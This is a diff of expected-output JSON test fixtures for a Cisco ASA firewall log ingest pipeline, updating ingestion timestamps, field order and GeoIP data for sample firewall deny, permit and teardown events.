@@ -20016,7 +20016,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364646700Z", + "ingested": "2021-12-14T14:36:23.392388043Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20097,7 +20097,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364651300Z", + "ingested": "2021-12-14T14:36:23.392388593Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20178,7 +20178,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364655400Z", + "ingested": "2021-12-14T14:36:23.392388980Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20259,7 +20259,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364659400Z", + "ingested": "2021-12-14T14:36:23.392389354Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20340,7 +20340,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364663800Z", + "ingested": "2021-12-14T14:36:23.392389737Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -20421,7 +20421,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364667900Z", + "ingested": "2021-12-14T14:36:23.392390117Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20502,7 +20502,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364672Z", + "ingested": "2021-12-14T14:36:23.392390504Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20583,7 +20583,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364675700Z", + "ingested": "2021-12-14T14:36:23.392391090Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20664,7 +20664,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364680200Z", + "ingested": "2021-12-14T14:36:23.392391472Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20745,7 +20745,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364684400Z", + "ingested": "2021-12-14T14:36:23.392391852Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -20826,7 +20826,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364688500Z", + "ingested": "2021-12-14T14:36:23.392392260Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20907,7 +20907,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364692900Z", + "ingested": "2021-12-14T14:36:23.392392637Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log-expected.json index f38b44ec55f..b1cfaed7e01 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log-expected.json @@ -1,34 +1,6 @@ { "expected": [ { - "log": { - "level": "informational" - }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.144", - "ip": "81.2.69.144" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "type": "firewall", "product": "asa", 
@@ -43,9 +15,28 @@ "81.2.69.144" ] }, + "log": { + "level": "informational" + }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.144", + "ip": "81.2.69.144" + }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:10.434308700Z", + "ingested": "2021-12-14T14:36:56.018932055Z", "original": "Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 81.2.69.144, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2", "code": "734001", "kind": "event", @@ -68,7 +59,10 @@ "dap_2" ] } - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-filtered.log-expected.json index 70db62062e6..06df5e68ca5 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-filtered.log-expected.json @@ -1,22 +1,16 @@ { "expected": [ { - "process": { - "name": "asa", - "pid": 1234 - }, - "log": { - "level": "debug" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "beats", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "asa", + "pid": 1234 + }, "@timestamp": "2021-01-01T01:00:27.000Z", "ecs": { "version": "1.12.0" 
@@ -26,12 +20,15 @@ "beats" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "beats" }, "event": { "severity": 7, - "ingested": "2021-12-09T13:32:10.616159800Z", + "ingested": "2021-12-14T14:36:56.170625119Z", "original": "Jan 1 01:00:27 beats asa[1234]: %ASA-7-999999: This message is not filtered.", "code": "999999", "kind": "event", @@ -45,7 +42,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -72,7 +72,7 @@ }, "event": { "severity": 8, - "ingested": "2021-12-09T13:32:10.616169400Z", + "ingested": "2021-12-14T14:36:56.170627623Z", "original": "Jan 1 01:00:30 beats asa[1234]: %ASA-8-999999: This phony message is dropped due to log level.", "code": "999999", "kind": "event", @@ -146,7 +146,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:10.616194900Z", + "ingested": "2021-12-14T14:36:56.170628084Z", "original": "Jan 1 01:02:12 beats asa[1234]: %ASA-2-106001: Inbound TCP connection denied from 10.13.12.11/45321 to 192.168.33.12/443 flags URG+SYN+RST on interface eth0", "code": "106001", "kind": "event", diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log-expected.json index 299a4b82c18..ab94e9534a0 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log-expected.json @@ -45,7 +45,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:10.900273500Z", + "ingested": "2021-12-14T14:36:56.443349711Z", "original": "Oct 10 2019 10:21:36 localhost: %ASA-6-302021: Teardown ICMP connection for faddr target.destination.hostname.local/10005 gaddr 10.0.55.66/0 laddr Prod-host.name.addr/0", "code": "302021", "kind": "event", 
@@ -107,7 +107,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:10.900281300Z", + "ingested": "2021-12-14T14:36:56.443351777Z", "original": "Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.15/0 gaddr 192.168.2.134/57808 laddr 192.168.2.134/57808 type 8 code 0", "code": "302021", "kind": "event", diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log-expected.json index 2eda35d4c50..2f08c6f88d6 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log-expected.json @@ -7,20 +7,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -73,7 +67,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.119441600Z", + "ingested": "2021-12-14T14:36:56.653383328Z", "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -\u003e OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", 
@@ -138,7 +132,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.119449700Z", + "ingested": "2021-12-14T14:36:56.653386031Z", "original": "Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -220,7 +214,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.119455300Z", + "ingested": "2021-12-14T14:36:56.653386545Z", "original": "Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware", "code": "338204", "kind": "event", diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log-expected.json index 686cc9c87b3..833642a7854 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log-expected.json @@ -48,7 +48,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.534937100Z", + "ingested": "2021-12-14T14:36:57.032435283Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", @@ -118,7 +118,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.534941700Z", + "ingested": "2021-12-14T14:36:57.032437545Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", 
@@ -188,7 +188,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.534947900Z", + "ingested": "2021-12-14T14:36:57.032437941Z", "original": "Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -266,7 +266,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.534954500Z", + "ingested": "2021-12-14T14:36:57.032438298Z", "original": "Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", "code": "106100", "kind": "event", @@ -343,7 +343,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.534960200Z", + "ingested": "2021-12-14T14:36:57.032438634Z", "original": "Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", "code": "106100", "kind": "event", @@ -413,7 +413,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.534965800Z", + "ingested": "2021-12-14T14:36:57.032438971Z", "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834", "code": "305011", "kind": "event", @@ -484,7 +484,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.534971700Z", + "ingested": "2021-12-14T14:36:57.032439303Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", "code": "302013", "kind": "event", 
@@ -556,7 +556,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.534977400Z", + "ingested": "2021-12-14T14:36:57.032439649Z", "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882", "code": "305011", "kind": "event", @@ -631,7 +631,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.534983100Z", + "ingested": "2021-12-14T14:36:57.032439997Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", "code": "302015", "kind": "event", @@ -703,7 +703,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.534988700Z", + "ingested": "2021-12-14T14:36:57.032440327Z", "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392", "code": "305011", "kind": "event", @@ -776,7 +776,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.534994300Z", + "ingested": "2021-12-14T14:36:57.032440655Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", "code": "302013", "kind": "event", @@ -850,7 +850,7 @@ "event": { "severity": 6, "duration": 5025000000000, - "ingested": "2021-12-09T13:32:11.535000400Z", + "ingested": "2021-12-14T14:36:57.032441189Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", "code": "302016", "kind": "event", 
@@ -923,7 +923,7 @@ "event": { "severity": 6, "duration": 36000000000000, - "ingested": "2021-12-09T13:32:11.535006100Z", + "ingested": "2021-12-14T14:36:57.032441536Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", "code": "302016", "kind": "event", @@ -991,7 +991,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535011800Z", + "ingested": "2021-12-14T14:36:57.032441866Z", "original": "Jun 04 2011 21:59:52 FJSG2NRFW01 : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -1058,7 +1058,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535017400Z", + "ingested": "2021-12-14T14:36:57.032442214Z", "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879", "code": "305011", "kind": "event", @@ -1131,7 +1131,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535021700Z", + "ingested": "2021-12-14T14:36:57.032442548Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", "code": "302013", "kind": "event", @@ -1195,7 +1195,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535026900Z", + "ingested": "2021-12-14T14:36:57.032442999Z", "original": "Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query", "code": "106007", "kind": "event", 
@@ -1261,7 +1261,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535031200Z", + "ingested": "2021-12-14T14:36:57.032443336Z", "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1331,7 +1331,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535035200Z", + "ingested": "2021-12-14T14:36:57.032443682Z", "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1401,7 +1401,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535039700Z", + "ingested": "2021-12-14T14:36:57.032444019Z", "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1471,7 +1471,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535045400Z", + "ingested": "2021-12-14T14:36:57.032444391Z", "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1541,7 +1541,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535049400Z", + "ingested": "2021-12-14T14:36:57.032444718Z", "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
@@ -1611,7 +1611,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535053900Z", + "ingested": "2021-12-14T14:36:57.032445173Z", "original": "Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1681,7 +1681,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535058800Z", + "ingested": "2021-12-14T14:36:57.032445603Z", "original": "Apr 30 2013 09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1751,7 +1751,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535063200Z", + "ingested": "2021-12-14T14:36:57.032445936Z", "original": "Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1821,7 +1821,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535067400Z", + "ingested": "2021-12-14T14:36:57.032446284Z", "original": "Apr 30 2013 09:22:48: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -\u003e dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1891,7 +1891,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535071Z", + "ingested": "2021-12-14T14:36:57.032446613Z", "original": "Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
@@ -1957,7 +1957,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535075400Z", + "ingested": "2021-12-14T14:36:57.032446941Z", "original": "Apr 30 2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside", "code": "106006", "kind": "event", @@ -2017,7 +2017,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535081200Z", + "ingested": "2021-12-14T14:36:57.032447268Z", "original": "Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query", "code": "106007", "kind": "event", @@ -2083,7 +2083,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535087900Z", + "ingested": "2021-12-14T14:36:57.032447603Z", "original": "Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2153,7 +2153,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535093200Z", + "ingested": "2021-12-14T14:36:57.032447954Z", "original": "Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2223,7 +2223,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535099Z", + "ingested": "2021-12-14T14:36:57.032449780Z", "original": "Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
@@ -2293,7 +2293,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535104800Z", + "ingested": "2021-12-14T14:36:57.032450212Z", "original": "Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2363,7 +2363,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535110600Z", + "ingested": "2021-12-14T14:36:57.032450553Z", "original": "Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2433,7 +2433,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535116400Z", + "ingested": "2021-12-14T14:36:57.032450977Z", "original": "Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", @@ -2503,7 +2503,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535122100Z", + "ingested": "2021-12-14T14:36:57.032451307Z", "original": "Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", @@ -2573,7 +2573,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535127900Z", + "ingested": "2021-12-14T14:36:57.032451640Z", "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
@@ -2643,7 +2643,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535133600Z", + "ingested": "2021-12-14T14:36:57.032451973Z", "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2713,7 +2713,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535139200Z", + "ingested": "2021-12-14T14:36:57.032452301Z", "original": "Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2788,7 +2788,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535144900Z", + "ingested": "2021-12-14T14:36:57.032452631Z", "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80)", "code": "302015", "kind": "event", @@ -2863,7 +2863,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535150500Z", + "ingested": "2021-12-14T14:36:57.032452964Z", "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", @@ -2936,7 +2936,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535156800Z", + "ingested": "2021-12-14T14:36:57.032453299Z", "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", 
@@ -3012,7 +3012,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535162600Z", + "ingested": "2021-12-14T14:36:57.032453635Z", "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", @@ -3090,7 +3090,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535168700Z", + "ingested": "2021-12-14T14:36:57.032453965Z", "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", @@ -3168,7 +3168,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:11.535173800Z", + "ingested": "2021-12-14T14:36:57.032454310Z", "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", "code": "302014", "kind": "event", @@ -3245,7 +3245,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:11.535178600Z", + "ingested": "2021-12-14T14:36:57.032454641Z", "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for 